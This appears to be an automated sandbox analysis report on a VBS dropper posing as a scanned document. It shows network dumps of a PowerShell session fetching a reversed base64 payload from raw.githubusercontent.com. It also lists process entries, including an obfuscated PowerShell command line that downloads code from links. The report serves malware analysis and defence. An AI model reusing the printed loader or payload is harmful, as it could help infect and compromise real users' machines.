                                2024-10-24 06:46:57 UTC16384INData Raw: d2 10 8a db f4 3d a9 25 27 6a a6 48 f6 a7 1c 05 77 06 91 75 3b a3 93 e5 48 42 31 22 81 07 f1 0f 43 42 55 dc 44 f9 c7 ad 02 88 0d c8 90 2a 4c 11 80 eb 7b 81 3e 83 b5 22 a0 76 81 cf 1d e9 c6 e1 bb b8 ed 49 38 21 5e c3 8a 42 11 52 41 9f 29 f3 f3 34 99 4c 27 76 e0 48 f3 f2 a5 ca 79 9a 4c a3 8d be b3 cd 21 09 28 6e 57 1e 7c 9e e6 69 25 ae 57 e4 4f a4 d2 b0 52 a2 7e 6f 9b f4 14 0b 6f 92 60 70 79 33 da 90 82 09 28 f4 93 1f 4a f2 9a 32 61 40 1a 10 41 44 09 f9 79 98 a5 54 92 a6 e7 ca 29 08 62 ea 08 31 34 92 d8 dc 48 9e d4 f5 68 ed 22 3f ce 92 2c 89 30 0c 11 eb 48 43 64 32 48 3f 31 83 43 e1 10 3f 11 3c 53 80 d9 6d 27 8e 05 79 40 2b ca 89 31 0c d6 df cb cf 73 48 5c 37 c0 83 4f cb 5b c7 00 09 f7 a4 2e 18 84 c0 1d 8d 3e 50 f8 22 56 d1 dc 60 c8 8a f3 4c 02 64 85 76 f5
                                Data Ascii: =%'jHwu;HB1"CBUD*L{>"vI8!^BRA)4L'vHyL!(nW|i%WOR~oo`py3(J2a@ADyT)b14Hh"?,0HCd2H?1C?<Sm'y@+1sH\7O[.>P"V`Ldv
                                2024-10-24 06:46:57 UTC16384INData Raw: 09 04 d1 25 90 1b 00 c0 ed da 2b c9 05 68 33 3c 79 7a d1 c3 20 1e 00 30 3d 68 c1 bd a0 f0 49 06 94 be 02 4c f3 69 10 27 c8 50 ab 94 24 f7 34 64 26 79 83 cf 14 45 c2 4f d7 de 98 76 37 75 25 43 82 45 35 bb 44 c0 fe a3 da 3b d3 a5 cc a8 08 14 d5 fe 55 10 47 1d e8 d9 18 c5 f4 14 a6 08 90 ae dc d2 7b 3b 19 2a f6 98 9a 70 f7 cd 3b a0 8f 38 a4 56 13 22 48 93 df eb 52 47 b0 84 97 dc 82 ae 0f 7f 6a 49 d1 fc ae 0c 1a 59 5d c8 ed 23 d6 93 71 09 2a e4 13 23 d6 8e 22 1b 38 de fe d1 f5 9a 6e e3 60 26 26 63 f6 a7 e5 b4 a4 a8 01 1e 46 93 76 d9 21 31 b7 f7 a2 23 79 6f 24 6b 9c 93 e7 e7 48 b8 9d a2 3b 03 df 9a 7e f5 a8 49 84 a4 c0 a4 97 6a 9d a4 11 c1 ed 4e 9e 05 f7 0c d5 29 57 92 53 eb 40 20 02 0f 98 9a 70 ed b4 08 e0 80 68 aa 68 48 e3 e5 07 81 45 90 e2 27 22 07 33 3e f4
                                Data Ascii: %+h3<yz 0=hILi'P$4d&yEOv7u%CE5D;UG{;*p;8V"HRGjIY]#q*#"8n`&&cFv!1#yo$kH;~IjN)WS@ phhHE'"3>
                                2024-10-24 06:46:57 UTC16384INData Raw: a3 4d 85 13 cc 45 2c 86 52 85 70 7c ea 36 c4 79 bb 70 04 13 1c 52 a9 6a 10 93 c7 1f bd 0a 00 31 c9 fd 29 46 a3 64 f9 54 61 e0 f2 b8 04 82 04 0a 4d d4 6e 51 20 47 b1 a5 c0 0b 07 83 44 71 02 7b f2 07 34 cd 8b 08 8d 7d a5 02 7b 73 4c 9e 6a 67 cc 7e f5 2c fa 06 e8 91 f5 a6 8b b7 f1 56 66 67 ca 9b 70 db 48 d3 68 44 f6 83 45 56 3e 4c 83 cd 49 fd cc 15 00 27 8a 59 18 f9 24 73 07 8a 2d c2 da 41 a7 14 12 e2 41 04 fb 9a 5c e3 82 62 23 9f 4e d5 33 fc 34 40 20 50 a6 c3 78 ed 1c cd 33 98 db 59 18 cd 8e e1 4e 19 b2 22 78 04 45 3f fb 90 4f 60 7b d2 cd 5a 02 ae dd cd 0e 58 4a 24 72 2d 02 11 20 73 da 8c 6d c2 f8 02 a4 15 66 90 aa 20 b7 04 c0 1e f4 c3 8c 3e ea 3b 8e 49 e7 8a 6d 70 cc 48 00 99 a9 55 31 ea a9 1e 9d a9 05 b5 c1 11 c7 bd 21 10 b7 4c 14 fb 93 cc 47 14 c5 e4 19
                                Data Ascii: ME,Rp|6ypRj1)FdTaMnQ GDq{4}{sLjg~,VfgpHhDEV>LI'Y$s-AA\b#N34@ Px3YN"xE?O`{ZXJ$r- smf >;ImpHU1!LG
                                2024-10-24 06:46:57 UTC16384INData Raw: e7 ce 80 42 2e 18 27 b7 04 d2 3b 64 79 52 ae a3 e6 89 33 e9 eb 5e 2d ed 40 05 5c cc 52 ca 10 dc b5 e9 45 f0 38 1e 67 f3 a7 0a 41 50 e3 9f 3e 28 c8 67 cd 47 e5 fd 29 08 69 e0 93 fd 3c 1f 5a 2b d6 68 29 f9 84 93 cf 7a 7b e0 24 2b 92 01 ed cf 9d 03 8c 48 8a 7c 8d b4 89 7a cc 15 76 e6 22 85 ab 4e 76 80 0e ea 7e a6 21 66 38 81 e4 28 10 da 64 12 09 52 47 6a 7d c0 e1 89 b3 60 14 04 8f 7e f4 55 e3 e0 9e 09 9f 7a 78 d2 42 47 13 df cf eb 4e ad 2d c3 e7 92 3e 62 69 9b 1f 04 13 d6 45 21 3c 6e 23 b0 35 13 7d 66 77 13 b7 b1 9a b9 64 71 41 9d a6 49 e4 f9 fe 95 0f 79 66 99 50 8e fe f3 34 f1 9f 20 b4 55 de 6b 6b 9b 60 47 ac d3 4b 86 c8 90 90 09 35 37 75 60 12 e1 27 8f af 95 47 dc b0 36 aa 0c c7 9d 4f 16 0b 44 2d ca 76 28 81 cc 53 37 49 93 d8 d4 95 fb 61 05 46 62 45 30 78
                                Data Ascii: B.';dyR3^-@\RE8gAP>(gG)i<Z+h)z{$+H|zv"Nv~!f8(dRGj}`~UzxBGN->biE!<n#5}fwdqAIyfP4 Ukk`GK57u`'G6OD-v(S7IaFbE0x
                                2024-10-24 06:46:57 UTC16384INData Raw: ea 25 50 07 04 0f 3a aa b1 fc b5 a4 83 0a ee 26 a5 2c 2f 52 d2 c9 33 00 f9 1a ab 38 64 24 d1 77 b7 c9 05 26 65 5c f3 c5 3d 6f 36 52 13 c9 3c f9 55 49 9c 9c 1e e7 e9 26 9d ff 00 12 f9 78 3c 81 55 bd a0 94 89 f7 f2 c5 e1 dc f1 ef 4c ae 32 44 72 0c 8f 39 f3 35 1b fc 44 84 72 66 91 7e ea 52 76 c9 8e 67 d6 ac 42 ac 01 29 a0 d9 8b e2 ab 75 12 40 1e 60 56 5f d4 3b 51 71 6a a7 0f 21 29 3c 4d 5e b3 17 72 db 80 91 c8 20 7a d6 6b d4 6c a9 63 1c b9 23 b1 1c 57 4f d1 ab 7b d1 97 ad 9a d8 d9 8f 6b 0c c9 62 79 4a 52 3b 7d 2a 89 95 b9 55 db 85 44 98 f6 ed 53 da a0 2a f6 ed c3 32 27 d6 a2 45 82 bc e0 88 e7 de bd 63 47 15 08 a6 70 5a b9 39 49 b2 ba eb 04 89 09 83 31 04 d1 85 99 92 20 f1 ef 56 4b 6c 22 56 20 20 12 7d a6 97 fe 04 59 04 f8 41 47 d7 d2 b5 16 a1 14 55 52 7c 95
                                Data Ascii: %P:&,/R38d$w&e\=o6R<UI&x<UL2Dr95Drf~RvgB)u@`V_;Qqj!)<M^r zklc#WO{kbyJR;}*UDS*2'EcGpZ9I1 VKl"V }YAGUR|
                                2024-10-24 06:46:57 UTC16384INData Raw: 61 76 96 c5 2a 41 07 bf 9d 67 fa af 01 f7 70 a3 b4 48 fe a9 31 5b da 2b a3 64 b0 8c 9b ea 94 56 46 97 79 b6 1f 3f 2a a2 7d 4f 7a 67 70 fb 0f a8 90 a4 cf ae ee c2 a2 92 10 90 a3 06 0f 79 34 93 c9 10 63 88 e4 f3 de ba 1a ea c6 0c 9b 27 91 67 51 04 ed 20 8f 3e 69 a3 ad 6e 33 cf 3c d1 dc 41 50 03 b4 f6 13 c5 37 75 b7 12 01 f9 8f d0 f6 ab 71 e0 81 ae 0f 2d 2a 27 f1 f3 eb 44 f0 16 4f 72 01 a5 ed db 52 91 11 df d8 cd 2e d5 ae d5 18 80 a3 c8 07 91 53 2e c4 72 42 0d 32 a4 ab 70 54 47 10 29 68 56 ef ad 38 65 21 07 b4 cd 2c 84 a5 46 02 39 ee 3d 29 dc f0 44 e0 35 46 e4 24 cc c9 06 20 d2 4a bb 71 6b 22 0c 7b f7 35 28 96 01 f2 81 db ff 00 35 26 fd 92 66 21 26 7d 3d 69 46 6b 23 35 e0 8f 5b ae 2d 12 49 f9 7d 4d 0b 2a 59 03 99 04 7d 29 e2 f1 46 e3 e6 42 80 03 d3 9a 4e e2
                                Data Ascii: av*AgpH1[+dVFy?*}Ozgpy4c'gQ >in3<AP7uq-*'DOrR.S.rB2pTG)hV8e!,F9=)D5F$ Jqk"{5(5&f!&}=iFk#5[-I}M*Y})FBN


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.749701185.199.108.1334438C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-10-24 06:47:03 UTC94OUTGET /IJEUWAESIKA/nna/refs/heads/main/IFiinmS.txt HTTP/1.1
                                Host: raw.githubusercontent.com
                                2024-10-24 06:47:03 UTC903INHTTP/1.1 200 OK
                                Connection: close
                                Content-Length: 624072
                                Cache-Control: max-age=300
                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                Content-Type: text/plain; charset=utf-8
                                ETag: "172554e9ebd6f3e01fcc8fe7c85300800defd675ef48345a1817f8928e009512"
                                Strict-Transport-Security: max-age=31536000
                                X-Content-Type-Options: nosniff
                                X-Frame-Options: deny
                                X-XSS-Protection: 1; mode=block
                                X-GitHub-Request-Id: A847:27B52F:584B21:61A642:6719ED65
                                Accept-Ranges: bytes
                                Date: Thu, 24 Oct 2024 06:47:03 GMT
                                Via: 1.1 varnish
                                X-Served-By: cache-dfw-kdal2120108-DFW
                                X-Cache: MISS
                                X-Cache-Hits: 0
                                X-Timer: S1729752423.213437,VS0,VE277
                                Vary: Authorization,Accept-Encoding,Origin
                                Access-Control-Allow-Origin: *
                                Cross-Origin-Resource-Policy: cross-origin
                                X-Fastly-Request-ID: 9af150ebc7040ab160b4504463178cb363b27d73
                                Expires: Thu, 24 Oct 2024 06:52:03 GMT
                                Source-Age: 0
                                2024-10-24 06:47:03 UTC1378INData Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                2024-10-24 06:47:03 UTC1378INData Raw: 44 4f 6b 76 44 34 37 77 39 4f 59 76 44 79 37 51 38 4f 30 75 44 6e 37 51 35 4f 51 75 44 6a 37 67 34 4f 45 75 44 67 37 41 33 4f 73 74 44 58 37 51 30 4f 38 73 44 4f 37 51 7a 4f 77 73 44 4c 37 77 78 4f 59 73 44 43 36 41 76 4f 6f 72 44 35 36 41 75 4f 63 72 44 32 36 67 73 4f 45 72 44 74 36 77 70 4f 55 71 44 6b 36 77 6f 4f 38 70 44 65 36 67 6d 4f 6b 70 44 56 36 77 6a 4f 30 6f 44 4d 36 41 69 4f 49 6f 44 41 35 77 66 4f 34 6e 44 39 35 51 65 4f 4d 6e 44 79 35 41 62 4f 6f 6d 44 70 35 41 61 4f 63 6d 44 6d 35 67 59 4f 45 6d 44 64 35 77 56 4f 55 6c 44 55 35 41 55 4f 38 6b 44 4c 35 51 52 4f 4d 6b 44 43 35 51 41 4f 30 6a 44 38 34 41 4f 4f 49 6a 44 77 34 77 4c 4f 34 69 44 74 34 51 4b 4f 67 69 44 6b 34 67 48 4f 77 68 44 62 34 67 47 4f 6b 68 44 56 34 41 46 4f 41 68 44 4b 34
                                Data Ascii: DOkvD47w9OYvDy7Q8O0uDn7Q5OQuDj7g4OEuDg7A3OstDX7Q0O8sDO7QzOwsDL7wxOYsDC6AvOorD56AuOcrD26gsOErDt6wpOUqDk6woO8pDe6gmOkpDV6wjO0oDM6AiOIoDA5wfO4nD95QeOMnDy5AbOomDp5AaOcmDm5gYOEmDd5wVOUlDU5AUO8kDL5QROMkDC5QAO0jD84AOOIjDw4wLO4iDt4QKOgiDk4gHOwhDb4gGOkhDV4AFOAhDK4
                                2024-10-24 06:47:03 UTC1378INData Raw: 55 6f 44 44 36 51 51 4f 38 6e 44 39 35 77 65 4f 6b 6e 44 33 35 51 64 4f 4d 6e 44 78 35 77 62 4f 30 6d 44 72 35 51 61 4f 63 6d 44 6c 35 77 59 4f 45 6d 44 66 35 51 58 4f 73 6c 44 5a 35 77 56 4f 55 6c 44 54 35 51 55 4f 38 6b 44 4e 35 77 53 4f 6b 6b 44 48 35 51 52 4f 4d 6b 44 42 34 77 50 4f 30 6a 44 37 34 51 4f 4f 63 6a 44 31 34 77 4d 4f 45 6a 44 76 34 51 4c 4f 73 69 44 70 34 77 4a 4f 55 69 44 6a 34 51 49 4f 38 68 44 64 34 77 47 4f 6b 68 44 58 34 51 46 4f 4d 68 44 52 34 77 44 4f 30 67 44 4c 34 51 43 4f 63 67 44 46 34 77 41 4f 45 63 44 2f 33 51 2f 4e 73 66 44 35 33 77 39 4e 55 66 44 7a 33 51 38 4e 38 65 44 74 33 77 36 4e 6b 65 44 6e 33 51 35 4e 4d 65 44 68 33 77 33 4e 30 64 44 62 33 51 32 4e 63 64 44 56 33 77 30 4e 45 64 44 50 33 51 7a 4e 73 63 44 4a 33 77 78
                                Data Ascii: UoDD6QQO8nD95weOknD35QdOMnDx5wbO0mDr5QaOcmDl5wYOEmDf5QXOslDZ5wVOUlDT5QUO8kDN5wSOkkDH5QROMkDB4wPO0jD74QOOcjD14wMOEjDv4QLOsiDp4wJOUiDj4QIO8hDd4wGOkhDX4QFOMhDR4wDO0gDL4QCOcgDF4wAOEcD/3Q/NsfD53w9NUfDz3Q8N8eDt3w6NkeDn3Q5NMeDh3w3N0dDb3Q2NcdDV3w0NEdDP3QzNscDJ3wx
                                2024-10-24 06:47:03 UTC1378INData Raw: 44 48 7a 51 78 4d 51 4d 44 44 7a 67 77 4d 45 4d 44 41 79 77 76 4d 34 4c 44 38 79 67 4f 41 41 41 41 58 41 55 41 45 41 6f 44 48 36 67 68 4f 55 6f 44 45 36 77 67 4f 49 6f 44 42 36 41 51 4f 38 6e 44 65 72 54 67 44 35 51 66 4f 77 6e 44 37 35 67 65 4f 6b 6e 44 34 35 77 64 4f 59 6e 44 31 35 41 64 4f 4d 6e 44 79 35 51 63 4f 41 6e 44 76 35 67 62 4f 30 6d 44 73 35 77 61 4f 6f 6d 44 70 35 41 61 4f 63 6d 44 6d 35 51 5a 4f 51 6d 44 6a 35 67 59 4f 45 6d 44 67 35 77 58 4f 34 6c 44 64 35 41 58 4f 73 6c 44 61 35 51 57 4f 67 6c 44 58 35 67 56 4f 55 6c 44 55 35 77 55 4f 49 6c 44 52 35 41 55 4f 38 6b 44 4f 35 51 54 4f 77 6b 44 4c 35 67 53 4f 6b 6b 44 49 35 77 52 4f 59 6b 44 46 35 41 52 4f 4d 6b 44 43 35 51 51 4f 41 67 44 2f 34 67 50 4f 30 6a 44 38 34 77 4f 4f 6f 6a 44 35 34
                                Data Ascii: DHzQxMQMDDzgwMEMDAywvM4LD8ygOAAAAXAUAEAoDH6ghOUoDE6wgOIoDB6AQO8nDerTgD5QfOwnD75geOknD45wdOYnD15AdOMnDy5QcOAnDv5gbO0mDs5waOomDp5AaOcmDm5QZOQmDj5gYOEmDg5wXO4lDd5AXOslDa5QWOglDX5gVOUlDU5wUOIlDR5AUO8kDO5QTOwkDL5gSOkkDI5wROYkDF5AROMkDC5QQOAgD/4gPO0jD84wOOojD54
                                2024-10-24 06:47:03 UTC1378INData Raw: 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 4f 63 6c 44 56 35 77 55 4f 45 6c 44 50 35 51 54 4f 73 6b 44 4a 35 77 52 4f 55 6b 44 44 35 51 41 4f 38 6a 44 39 34 77 4f 4f 6b 6a 44 33 34 51 4e 4f 4d 6a 44 78 34 77 4c 4f 30 69 44 72 34 51 4b 4f 63 69 44 6c 34 77 49 4f 45 69 44 66 34 51 48 4f 73 68 44 5a 34 77 46 4f 55 68 44 54 34 51 45 4f 38 67 44 4e 34 77 43 4f 6b 67 44 48 34 51 42 4f 4d 67 44 42 33 77 2f 4e 30 66 44 37 33 51 65 72 54 67 44 4e 63 66 44 31 33 77 38 4e 45 66 44 76 33 51 37 4e 73 65 44 70 33 77 35 4e 55 65 44 6a 33 51 34 4e 38 64 44 64 33 77 32 4e 6b 64 44 58 33 51 31 4e 4d 64 44 52 33 77 7a 4e 30 63 44 4c 33 51 79 4e 63 63 44 46 33 77 77 4e 45 59 44 2f 32 51 76 4e 73 62 44 35 32 77 74
                                Data Ascii: 5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73QerTgDNcfD13w8NEfDv3Q7NseDp3w5NUeDj3Q4N8dDd3w2NkdDX3Q1NMdDR3wzN0cDL3QyNccDF3wwNEYD/2QvNsbD52wt
                                2024-10-24 06:47:03 UTC1378INData Raw: 54 34 7a 38 37 4d 33 4f 54 53 7a 30 7a 4d 78 4d 54 48 7a 45 68 4d 76 4b 7a 70 79 6b 6f 4d 42 4b 54 65 79 45 6e 4d 4f 49 54 42 78 34 64 4d 57 48 7a 76 78 73 5a 4d 66 46 54 49 77 51 4f 4d 6f 43 54 6d 77 6f 49 4d 58 42 7a 54 41 41 41 41 38 43 41 42 77 43 77 50 4c 65 72 54 67 44 7a 67 2f 73 33 50 7a 38 6a 44 65 72 54 67 44 77 75 50 48 37 44 75 65 72 54 67 44 6b 61 50 6b 7a 6a 6c 37 34 65 72 54 67 44 4f 53 76 6a 54 37 45 44 4f 6c 67 7a 48 34 73 77 4e 74 66 7a 32 33 59 74 4e 33 5a 7a 51 32 49 68 4e 4d 55 54 70 30 6f 4c 4e 72 53 7a 6e 30 38 49 4e 79 52 6a 61 30 41 30 4d 35 50 54 32 7a 30 38 4d 42 50 54 72 7a 45 36 4d 2f 4d 7a 4e 7a 6b 78 4d 52 4d 54 43 7a 45 67 4d 35 4c 44 70 79 67 49 4d 37 44 54 38 77 63 4d 4d 36 43 6a 54 77 55 45 4d 38 41 7a 4a 41 41 41 41 34
                                Data Ascii: T4z87M3OTSz0zMxMTHzEhMvKzpykoMBKTeyEnMOITBx4dMWHzvxsZMfFTIwQOMoCTmwoIMXBzTAAAA8CABwCwPLerTgDzg/s3Pz8jDerTgDwuPH7DuerTgDkaPkzjl74erTgDOSvjT7EDOlgzH4swNtfz23YtN3ZzQ2IhNMUTp0oLNrSzn08INyRja0A0M5PT2z08MBPTrzE6M/MzNzkxMRMTCzEgM5LDpygIM7DT8wcMM6CjTwUEM8AzJAAAA4
                                2024-10-24 06:47:03 UTC1378INData Raw: 35 4d 52 4f 4c 67 54 2f 34 59 4c 4f 70 69 54 6c 34 4d 49 4f 62 63 54 75 33 41 67 4e 34 62 6a 36 32 6b 74 4e 4d 62 54 77 32 45 6f 4e 73 5a 44 57 32 77 6b 4e 44 55 7a 77 31 41 62 4e 4f 57 44 61 31 55 45 4e 38 54 7a 39 30 45 50 4e 73 54 6a 75 30 38 47 4e 49 52 44 46 7a 49 34 4d 76 4e 54 4f 7a 49 67 4d 4e 4c 44 78 79 59 72 4d 68 4b 54 63 79 6f 6c 4d 50 4a 7a 4f 79 41 6a 4d 72 49 6a 43 78 30 4e 41 41 41 41 6f 41 51 41 45 41 41 41 41 2f 73 38 50 77 65 72 54 67 44 44 65 2f 41 79 50 51 38 6a 42 65 72 54 67 44 6b 76 50 76 37 44 34 65 72 54 67 44 59 73 50 2f 36 44 75 65 72 54 67 44 45 72 50 65 72 54 67 44 35 54 61 65 72 54 67 44 51 6d 50 54 35 54 53 65 72 54 67 44 73 69 50 50 30 54 2f 39 73 65 50 63 33 6a 59 38 6b 46 50 79 73 7a 78 37 41 71 4f 37 66 6a 36 33 49 36
                                Data Ascii: 5MROLgT/4YLOpiTl4MIObcTu3AgN4bj62ktNMbTw2EoNsZDW2wkNDUzw1AbNOWDa1UEN8Tz90EPNsTju08GNIRDFzI4MvNTOzIgMNLDxyYrMhKTcyolMPJzOyAjMrIjCx0NAAAAoAQAEAAAA/s8PwerTgDDe/AyPQ8jBerTgDkvPv7D4erTgDYsP/6DuerTgDErPerTgD5TaerTgDQmPT5TSerTgDsiPP0T/9sePc3jY8kFPyszx7AqO7fj63I6
                                2024-10-24 06:47:03 UTC1378INData Raw: 44 4d 31 45 66 4e 75 52 7a 72 30 55 4a 4e 6f 51 54 48 30 73 41 4e 46 45 44 35 77 59 45 41 41 41 41 56 41 4d 41 6f 41 41 41 41 2f 30 35 50 61 35 6a 4f 39 34 61 50 4e 32 6a 51 39 59 54 50 69 30 44 48 39 49 52 50 48 77 7a 67 38 73 48 50 7a 78 44 5a 38 6f 46 50 50 78 7a 47 37 4d 75 4f 63 72 54 6f 36 4d 6d 4f 48 70 7a 4d 35 63 65 4f 44 6e 6a 68 35 41 55 4f 6d 67 7a 2f 34 73 4d 4f 45 69 7a 65 34 6f 47 4f 46 68 54 4c 34 55 43 4f 5a 67 7a 42 33 34 65 72 54 67 44 4e 6d 66 7a 33 33 45 39 4e 45 66 7a 76 33 49 37 4e 74 65 44 70 33 59 35 4e 51 65 54 68 33 38 33 4e 30 64 44 62 33 45 32 4e 62 64 6a 53 33 55 30 4e 32 63 7a 41 32 41 76 4e 61 62 6a 7a 32 45 73 4e 38 61 6a 68 32 51 6e 4e 77 55 6a 73 31 73 5a 4e 46 51 7a 75 30 4d 4b 4e 55 52 54 53 7a 41 2f 4d 50 50 44 77 7a
                                Data Ascii: DM1EfNuRzr0UJNoQTH0sANFED5wYEAAAAVAMAoAAAA/05Pa5jO94aPN2jQ9YTPi0DH9IRPHwzg8sHPzxDZ8oFPPxzG7MuOcrTo6MmOHpzM5ceODnjh5AUOmgz/4sMOEize4oGOFhTL4UCOZgzB34erTgDNmfz33E9NEfzv3I7NteDp3Y5NQeTh383N0dDb3E2NbdjS3U0N2czA2AvNabjz2EsN8ajh2QnNwUjs1sZNFQzu0MKNURTSzA/MPPDwz
                                2024-10-24 06:47:03 UTC1378INData Raw: 44 30 51 50 77 77 44 75 38 55 4b 50 56 78 44 42 37 73 65 72 54 67 44 4f 66 76 54 7a 37 67 36 4f 65 75 6a 6a 37 6b 34 4f 42 75 54 55 37 77 30 4f 48 74 7a 4f 37 51 78 4f 50 73 6a 43 36 34 76 4f 61 72 54 31 36 41 74 4f 45 72 44 6f 36 73 70 4f 57 71 54 6a 36 59 6d 4f 68 70 44 58 36 77 6b 4f 71 6f 44 48 36 41 68 4f 42 6b 54 35 35 73 62 4f 7a 6d 44 6e 35 77 59 4f 51 6c 44 52 35 55 41 4f 61 6a 54 67 34 38 47 4f 6e 64 7a 37 30 30 65 72 54 67 44 4d 79 4f 44 68 7a 34 33 4d 79 42 41 41 41 51 49 41 43 41 4f 41 2f 77 39 50 59 2f 44 31 2f 41 39 50 4c 2f 6a 68 2f 41 7a 50 73 38 44 4b 2f 51 79 50 66 38 44 47 65 72 54 67 44 45 65 50 7a 30 54 4a 39 63 41 50 30 7a 44 52 38 45 77 4f 37 76 7a 36 37 49 38 4f 5a 75 7a 63 37 45 31 4f 4c 74 54 50 37 67 7a 4f 79 73 44 4c 37 59 79
                                Data Ascii: D0QPwwDu8UKPVxDB7serTgDOfvTz7g6Oeujj7k4OBuTU7w0OHtzO7QxOPsjC64vOarT16AtOErDo6spOWqTj6YmOhpDX6wkOqoDH6AhOBkT55sbOzmDn5wYOQlDR5UAOajTg48GOndz700erTgDMyODhz43MyBAAAQIACAOA/w9PY/D1/A9PL/jh/AzPs8DK/QyPf8DGerTgDEePz0TJ9cAP0zDR8EwO7vz67I8OZuzc7E1OLtTP7gzOysDL7Yy
                                2024-10-24 06:47:03 UTC1378INData Raw: 74 50 45 37 6a 76 65 72 54 67 44 45 72 50 6f 35 7a 54 65 72 54 67 44 63 6b 50 67 34 7a 45 39 55 62 50 72 32 54 6d 39 4d 5a 50 4d 32 7a 64 39 45 56 50 41 31 44 4d 39 51 53 50 52 77 6a 2f 38 38 4b 50 44 75 54 4b 37 38 78 4f 56 73 7a 43 37 45 67 4f 37 66 7a 77 33 77 69 4e 66 61 54 44 31 59 49 4e 2f 54 44 65 7a 49 76 4d 6b 49 6a 45 78 30 66 4d 49 48 6a 70 78 6b 59 4d 71 46 44 56 78 63 54 4d 76 41 41 41 41 51 4a 41 43 41 4c 41 34 6b 4f 4f 55 6a 7a 76 34 49 47 41 41 41 41 45 41 49 41 6f 41 34 6a 41 39 38 4b 41 41 41 41 44 41 49 41 6b 41 30 6a 55 39 4d 55 4f 70 6d 54 6b 35 30 58 4f 38 41 41 41 41 51 42 41 43 41 49 41 41 41 41 50 72 79 54 6e 38 77 49 50 76 78 44 59 41 41 41 41 55 41 67 41 67 42 41 41 41 55 54 50 31 77 52 4e 4b 51 7a 65 72 54 67 44 30 55 4e 41 41
                                Data Ascii: tPE7jverTgDErPo5zTerTgDckPg4zE9UbPr2Tm9MZPM2zd9EVPA1DM9QSPRwj/88KPDuTK78xOVszC7EgO7fzw3wiNfaTD1YIN/TDezIvMkIjEx0fMIHjpxkYMqFDVxcTMvAAAAQJACALA4kOOUjzv4IGAAAAEAIAoA4jA98KAAAADAIAkA0jU9MUOpmTk50XO8AAAAQBACAIAAAAPryTn8wIPvxDYAAAAUAgAgBAAAUTP1wRNKQzerTgD0UNAA


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:02:46:51
                                Start date:24/10/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs"
                                Imagebase:0x7ff636340000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:2
                                Start time:02:46:52
                                Start date:24/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N